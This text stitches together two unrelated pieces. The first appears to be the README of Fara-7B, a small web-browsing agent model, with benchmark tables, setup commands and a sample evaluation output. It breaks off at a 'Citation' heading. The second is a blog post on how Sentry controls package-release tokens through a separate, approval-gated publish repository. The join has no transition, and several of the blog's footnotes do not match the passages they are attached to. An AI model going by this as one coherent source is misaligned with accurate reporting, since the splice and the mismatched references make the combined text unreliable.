Unlike traditional chat models that generate text-based responses, Fara-7B leverages computer interfaces—mouse and keyboard—to perform multi-step tasks on behalf of users. The model:
Operates visually
by perceiving webpages and taking actions like scrolling, typing, and clicking on directly predicted coordinates
Uses the same modalities as humans
to interact with computers—no accessibility trees or separate parsing models required
Enables on-device deployment
due to its compact 7B parameter size, resulting in reduced latency and improved privacy as user data remains local
Completes tasks efficiently
, averaging only ~16 steps per task compared to ~41 for comparable models
Fara-7B is trained using a novel synthetic data generation pipeline built on the
Magentic-One
multi-agent framework, with 145K trajectories covering diverse websites, task types, and difficulty levels. The model is based on
Qwen2.5-VL-7B
and trained with supervised fine-tuning.
Key Capabilities
Fara-7B can automate everyday web tasks including:
Searching for information and summarizing results
Filling out forms and managing accounts
Booking travel, movie tickets, and restaurant reservations
Shopping and comparing prices across retailers
Finding job postings and real estate listings
Performance Highlights
Fara-7B achieves state-of-the-art results across multiple web agent benchmarks, outperforming both comparable-sized models and larger systems:
Model
Params
WebVoyager
Online-M2W
DeepShop
WebTailBench
SoM Agents
SoM Agent (GPT-4o-0513)
-
90.6
57.7
49.1
60.4
SoM Agent (o3-mini)
-
79.3
55.4
49.7
52.7
SoM Agent (GPT-4o)
-
65.1
34.6
16.0
30.8
GLM-4.1V-9B-Thinking
9B
66.8
33.9
32.0
22.4
Computer Use Models
OpenAI computer-use-preview
-
70.9
42.9
24.7
25.7
UI-TARS-1.5-7B
7B
66.4
31.3
11.6
19.5
Fara-7B
7B
73.5
34.1
26.2
38.4
Table: Online agent evaluation results showing success rates (%) across four web benchmarks. Results are averaged over 3 runs.
WebTailBench: A New Benchmark for Real-World Web Tasks
We are releasing
WebTailBench
, a new evaluation benchmark focusing on 11 real-world task types that are underrepresented or missing in existing benchmarks. The benchmark includes 609 tasks across diverse categories, with the first 8 segments testing single skills or objectives (usually on a single website), and the remaining 3 evaluating more difficult multi-step or cross-site tasks.
WebTailBench Detailed Results
Task Segment
Tasks
SoM GPT-4o-0513
SoM o3-mini
SoM GPT-4o
GLM-4.1V-9B
OAI Comp-Use
UI-TARS-1.5
Fara-7B
Single-Site Tasks
Shopping
56
62.5
71.4
38.1
31.0
42.3
41.1
52.4
Flights
51
60.1
39.2
11.1
10.5
17.6
10.5
37.9
Hotels
52
68.6
56.4
31.4
19.9
26.9
35.3
53.8
Restaurants
52
67.9
59.6
47.4
32.1
35.9
22.4
47.4
Activities
80
70.4
62.9
41.7
26.3
30.4
9.6
36.3
Ticketing
57
58.5
56.7
37.4
35.7
49.7
30.4
38.6
Real Estate
48
34.0
17.4
20.1
16.0
9.0
9.7
23.6
Jobs/Careers
50
49.3
44.0
32.7
22.7
20.7
20.7
28.0
Multi-Step Tasks
Shopping List (2 items)
51
66.0
62.7
17.0
7.8
34.0
20.9
49.0
Comparison Shopping
57
67.3
59.1
27.5
22.8
1.2
8.8
32.7
Compositional Tasks
55
51.5
39.4
26.7
17.0
10.3
9.1
23.0
Overall
Macro Average
609
59.7
51.7
30.1
22.0
25.3
19.9
38.4
Micro Average
609
60.4
52.7
30.8
22.4
25.7
19.5
38.4
Table: Breakdown of WebTailBench results across all 11 segments. Success rates (%) are averaged over 3 independent runs. Fara-7B achieves the highest performance among computer-use models across all task categories.
Coming Soon:
Task Verification pipeline for LLM-as-a-judge evaluation
Official human annotations of WebTailBench (in partnership with BrowserBase)
Evaluation Infrastructure
Our evaluation setup leverages:
Playwright
- A cross-browser automation framework that replicates browser environments
Abstract Web Agent Interface
- Allows integration of any model from any source into the evaluation environment
Fara-Agent Class
- Reference implementation for running the Fara model
Note:
Fara-7B is an experimental release designed to invite hands-on exploration and feedback from the community. We recommend running it in a sandboxed environment, monitoring its execution, and avoiding sensitive data or high-risk domains.
Installation
Install the package using either UV or pip:
or
Then install Playwright browsers:
Hosting the Model
Recommended:
The easiest way to get started is using Azure Foundry hosting, which requires no GPU hardware or model downloads. Alternatively, you can self-host with VLLM if you have GPU resources available.
Azure Foundry Hosting (Recommended)
Deploy Fara-7B on
Azure Foundry
without needing to download weights or manage GPU infrastructure.
Setup:
Deploy the Fara-7B model on Azure Foundry and obtain your endpoint URL and API key
Add your endpoint details to the existing
endpoint_configs/
directory (example configs are already provided):
# Edit one of the existing config files or create a new one# endpoint_configs/fara-7b-hosting-ansrz.json (example format):
{
"model": "Fara-7B",
"base_url": "https://your-endpoint.inference.ml.azure.com/",
"api_key": "YOUR_API_KEY_HERE"
}
Run the Fara agent:
fara-cli --task "how many pages does wikipedia have" --start_page "https://www.bing.com"
That's it! No GPU or model downloads required.
Self-hosting with VLLM
If you have access to GPU resources, you can self-host Fara-7B using VLLM. This requires a GPU machine with sufficient VRAM.
All that is required is to run the following command to start the VLLM server:
vllm serve "microsoft/Fara-7B" --port 5000 --dtype auto
Testing the Fara Agent
Run the test script to see Fara in action:
fara-cli --task "how many pages does wikipedia have" --start_page "https://www.bing.com" --endpoint_config endpoint_configs/azure_foundry_config.json [--headful] [--downloads_folder "/path/to/downloads"] [--save_screenshots] [--max_rounds 100] [--browserbase]
In self-hosting scenario the
endpoint_config
points to
endpoint_configs/vllm_config.json
from the VLLM server above.
If you set
--browserbase
, export environment variables for the API key and project ID.
Expected Output
Initializing Browser...
Browser Running... Starting Fara Agent...
##########################################
Task: how many pages does wikipedia have
##########################################
Running Fara...
Thought #1: To find the current number of Wikipedia pages, I'll search for the latest Wikipedia page count statistics.
Action #1: executing tool 'web_search' with arguments {"action": "web_search", "query": "Wikipedia total number of articles"}
Observation#1: I typed 'Wikipedia total number of articles' into the browser search bar.
Thought #2: Wikipedia currently has 7,095,446 articles.
Action #2: executing tool 'terminate' with arguments {"action": "terminate", "status": "success"}
Observation#2: Wikipedia currently has 7,095,446 articles.
Final Answer: Wikipedia currently has 7,095,446 articles.
Enter another task (or press Enter to exit):
Reproducibility
We provide a framework in
webeval/
to reproduce our results on WebVoyager and OnlineMind2Web.
Agentic evaluations on live websites present unique challenges due to day-to-day changes. We implement several measures to ensure reliable and comparable evaluations:
BrowserBase Integration
We employ BrowserBase to manage browser session hosting, enabling reliable browser instance management.
Time-sensitive Task Updates
Tasks in benchmarks like WebVoyager can become stale or impossible. We:
Removed ~48 impossible tasks from the original WebVoyager benchmark
Updated ~50 tasks with future dates to keep them achievable
Example:
"Search for a hotel in Bali from Jan 1 to Jan 4, 2024"
→
"Search for a hotel in Bali from Jan 1 to Jan 4, 2026"
Our updated WebVoyager benchmark is available at
webeval/data/webvoyager/WebVoyager_data_08312025.jsonl
Trajectories are retried up to 5 times when environment errors occur
Complete yet incorrect trajectories are never retried
Each retry starts with a fresh browser session, with no retained state
Step Budget
Each trajectory is capped at a maximum of 100 actions across all online benchmarks. Trajectories exceeding this budget without choosing to stop are considered incorrect.
screenshot_X.png
- Screenshots captured before each action X
Running Analysis
Use the analysis notebook to compute metrics:
cd webeval/scripts/analyze_eval_results/
jupyter notebook analyze.ipynb
The script:
Identifies trajectories aborted mid-execution and diagnostic reasons
Computes average scores across non-aborted trajectories
Distinguishes between aborted trajectories (errors during sampling) and completed trajectories (with terminate() call or step budget exceeded)
To re-run failed tasks, execute the evaluation script again with the same
run_id
and
username
- it will skip non-aborted tasks.
Example WebVoyager GPT Eval Result
{
"score": 1.0,
"gpt_response_text": "To evaluate the task, we need to verify if the criteria have been met:\n\n1. **Recipe Requirement**: A vegetarian lasagna recipe with zucchini and at least a four-star rating.\n\n2. **Search and Results**:\n - The screenshots show that the search term used was \"vegetarian lasagna zucchini.\"\n - Among the search results, \"Debbie's Vegetable Lasagna\" is prominently featured.\n\n3. **Evaluation of the Recipe**:\n - Rating: \"Debbie's Vegetable Lasagna\" has a rating of 4.7, which satisfies the requirement of being at least four stars.\n - The presence of zucchini in the recipe is implied through the search conducted, though the screenshots do not explicitly show the ingredients list. However, the result response confirms the match to the criteria.\n\nGiven the information provided, the task seems to have fulfilled the requirement of finding a vegetarian lasagna recipe with zucchini and a four-star rating or higher. \n\n**Verdict: SUCCESS**"
}
Citation
If you use Fara in your research, please cite our work:
Releasing Packages with a Valet Key: npm, PyPI, and beyond
Disclaimer: This post should have been written about 5 years ago but I never got around to it; with the most recent
Shai-Hulud attack
, I thought it would be a good time to finally check this off the list and hopefully help others avoid supply-chain attacks.
About 5 years ago, I sat in on a meeting at Sentry in the midst of their SOC 2 compliance efforts. There was
Armin
, telling us that we needed a secret storage service for our package repository tokens. The tokens we used to deploy Sentry SDKs to package repositories such as npm, PyPI etc. This was to ensure there were no unauthorized releases of our SDKs which were embedded into all Sentry customers’ products. There were a limited set of people who had access to these tokens back in the time. Now, they became the bottleneck for more and more frequent releases. There was also the auditability issue at hand: releases were performed from individuals’ workstations and there was no easy way to trace a release back to where it originated from or whether it was authorized or not.
For some reason I intuitively was against such a secret storage service and felt like the answer was somewhere in GitHub, GitHub Actions, and their secret storage service we already used. We already had the repo permissions, personnel structure, and all the visibility for auditing there. Heck, even the approval mechanics were there with pull requests. So I said “give me a week and I’ll get you a proof of concept” which Armin did and I delivered - though I think it took a bit more than a week 😅
Secrets in Plain Sight
Before we dive into the solution, let me paint a picture of the problem. Publishing packages to registries like npm, PyPI, or crates.io requires access tokens. These tokens are essentially the keys to the kingdom - whoever has them can publish anything under your organization’s name. At the time, these tokens were either distributed to select individuals, or lived in GitHub repository secrets, accessible to anyone with write access to the repository.
1
Now, here’s the scary part: at Sentry, we had 90-100+ engineers with commit rights to our SDK repositories. Any one of them could:
Create a new workflow or modify an existing one
Access these secrets within that workflow
Exfiltrate them to any web service they controlled
Do all of the above without triggering any alarms
And the truly terrifying bit? Even if someone
did
steal these tokens, there would be no indication whatsoever. No alerts, no logs, nothing. They could sit on these credentials and use them months later, long after they’ve left the company. We’ve seen this exact scenario play out recently with supply-chain attacks like the
Shai-Hulud npm takeover
where attackers compromised maintainer accounts to publish malicious versions of popular packages.
The Valet Key
Some fancy cars come with a “valet key” - a special key you give to parking attendants or car wash folks. Unlike your regular key, this one has limited capabilities: maybe it can only go up to 20mph, can’t open the trunk, or won’t let you disable the alarm. It’s the same car, but with reduced privileges for reduced risk of theft.
This concept maps beautifully to our problem. Instead of giving everyone the full keys (the publishing tokens), why not give them a way to
request
the car to be moved (a release be made)? The actual keys stay with a very small, trusted (and monitored) group who are the builders and maintainers of the infrastructure. Even the approvers don’t actually have access to the keys!
Here’s what we wanted:
Secrets in a secure, limited-access location
- only 3-4 release engineers should have access
Clear approval process
- every release needs explicit sign-off from authorized personnel
Low friction for developers
- anyone should be able to
request
a release easily
Full audit trail
- everything logged being compliance-friendly
No new infrastructure
- we didn’t want to build or maintain a separate secrets service
As a side note, trusted publishing through OIDC and OAuth with limited and very short-lived tokens is the
actual
digital equivalent of valet keys. npm is slowly rolling this out
2
, but at the time we built this system, it wasn’t an option. And even today, it’s not available at the organization/scope level which is what we’d need. Also, we publish way more places than npm so we need a more generic solution.
Another approach worth mentioning is Google’s
Wombat Dressing Room
- an npm registry proxy that funnels all publishes through a single bot account with 2FA enabled. It’s a clever solution if you’re npm-only and want something off-the-shelf. That said it still requires running a separate service.
3
Enter getsentry/publish
The solution we landed on is beautifully simple in hindsight: a
separate repository
dedicated entirely to publishing. Here’s the trick:
Write access is extremely limited
- only 3-4 release engineers can actually modify the repo
Release managers get “triage” access
- GitHub’s triage role lets you manage issues and labels, but not code - perfect for approving releases
Everyone else can create issues
- that’s all you need to request a release
Approval happens via labels
- a release manager adds the “accepted” label to trigger the actual publish
The beauty of this setup is that the publishing tokens live
only
in this repo’s secrets. The repo itself is mostly static - we rarely need to modify the actual code - so the attack surface is minimal.
The Implementation (with Craft)
Under the hood, we use
Craft
, our CLI tool for managing releases. Craft was designed with a crucial architectural decision that predates the publish repo: it separates releases into two distinct phases -
prepare
and
publish
.
The
prepare
phase is where all the “dangerous” work happens:
npm install
, build scripts, test runs, changelog generation. This phase runs in the SDK repository
without
any access to publishing tokens. The resulting artifacts are uploaded to GitHub as,
well
, build artifacts.
The
publish
phase simply downloads these pre-built artifacts and pushes them to the registries. No
npm install
, no build scripts, no arbitrary code execution - just download and upload. This dramatically reduces the attack surface during the privileged publishing step. Even if an attacker managed to inject malicious code into a dependency, it would only execute during the prepare phase which has no access to publishing credentials.
This two-phase architecture is what makes supply-chain attacks like
Shai-Hulud
much harder to pull off against Sentry’s SDKs. The malicious code would need to somehow persist through the artifact upload/download cycle and execute during a phase that deliberately runs no code.
The magic happens with our GitHub Actions setup:
Developer triggers release workflow
in their SDK repo (e.g.,
sentry-javascript
)
action-prepare-release
runs
craft prepare
: creates the release branch, updates changelogs, builds artifacts, uploads them to GitHub
An issue is automatically created
in
getsentry/publish
with all the details: what changed, what’s being released, which targets
Release manager reviews and approves
by adding the “accepted” label
Publishing workflow triggers
craft publish
: downloads artifacts from GitHub and pushes to npm, PyPI, crates.io, etc. - no build step, just upload
Fighting Overprotective Parents
GitHub, bless their security-conscious hearts, put up quite a few guardrails that we had to work around. Here’s where things got… creative:
The Token Trigger Problem
: For the automation, we had to use the
Sentry Release Bot
, a GitHub App that generates short-lived tokens. This is crucial because
GITHUB_TOKEN
(default token GitHub Actions creates) has a security restriction: actions triggered by it don’t trigger other actions
4
. We needed workflows in
getsentry/publish
to trigger based on issues created from SDK repos, so we had to work around this.
The Admin Bot Account
: We needed a bot that could commit directly to protected branches. GitHub’s branch protection rules
are
were all-or-nothing - you can’t say “this bot can commit, but only to update
CHANGELOG.md
”. So our bot ended up with admin access on all repos. Not ideal, but necessary
5
.
Composite Actions and Working Directories
: If you’ve ever tried to use GitHub’s composite actions with custom working directories, you know the pain. There’s no clean way to say “run this composite action from this subdirectory”. We ended up with various hacks involving explicit
cd
commands and careful path management.
Some More
Creative
Workarounds
: We maintain a small collection of ugly-but-necessary workarounds in our action definitions. They’re not pretty, but they work. Sometimes pragmatism beats elegance
6
.
Happily Ever After
After all this work, what did we actually achieve?
Compliance-friendly
✓ - every release is logged, approved, and traceable
Centralized secrets
- tokens live in one place, accessible to very few
Developer convenience
- anyone can request a release with a few clicks
Enterprise security
- no individual has publishing credentials on their machine
Full transparency
- the entire
publish repo
is open, notifications enabled for stakeholders
We’ve made more than
6,000 releases
through this system and happily counting upwards. Every single one is traceable: who requested it, who approved it, what changed, when it shipped.
Why This Matters Today
Recent supply-chain attacks like
Shai-Hulud
show exactly why this architecture matters. When attackers compromise a maintainer’s npm account, they can publish malicious versions of packages that millions of developers will automatically install. With our system:
No individual at Sentry has npm/PyPI/crates.io credentials on their machine
Every release requires explicit approval from a release manager
The approval happens in a public repo with full audit trail
Any suspicious activity would be immediately visible
Is it perfect? No. Could a determined attacker with inside access still cause damage? Probably. But we’ve dramatically reduced the attack surface and made any compromise immediately visible and auditable.
Closing Thoughts
Looking back, this is one of my proudest achievements at Sentry. It’s not flashy - no one’s going to write a blog post titled “Revolutionary New Way to Click a Label” - but it’s the kind of infrastructure that quietly makes everything more secure and more convenient at the same time.
7
If you’re dealing with similar challenges, I encourage you to check out
getsentry/publish
and the
Craft
. The concepts are transferable even if you don’t use our exact implementation.
And hey, it only took me 5 years to write about it. Better late than never, right? 😅
Thanks
I’d like to thank the following people:
Armin
and
Daniel
for their trust and support in building this system.
Jeffery
for reviewing this post thoroughly and being my partner in crime for many things security at Sentry.
Michael
for giving me the push I needed to write this post, coming up with the awesome post image idea, and for his support and guidance on the post itself.
This was before GitHub introduced “environment secrets” which allow more granular access control. Even with those, the problem isn’t fully solved for our use case.
↩
If only someone could make this run directly in GitHub Actions…
↩
This is actually a smart security feature - imagine a workflow that creates a commit that triggers itself. Infinite loop, infinite bills, infinite sadness.
↩
This is now fixed with special
by-pass rules via rule sets
recently and we also no longer have admin access for the bots, phew.
↩
If you peek at the repo, you’ll see what I mean. I’m not proud of all of it, but I’m proud it works.
↩
Especially while “security means more friction” is still a thing.
↩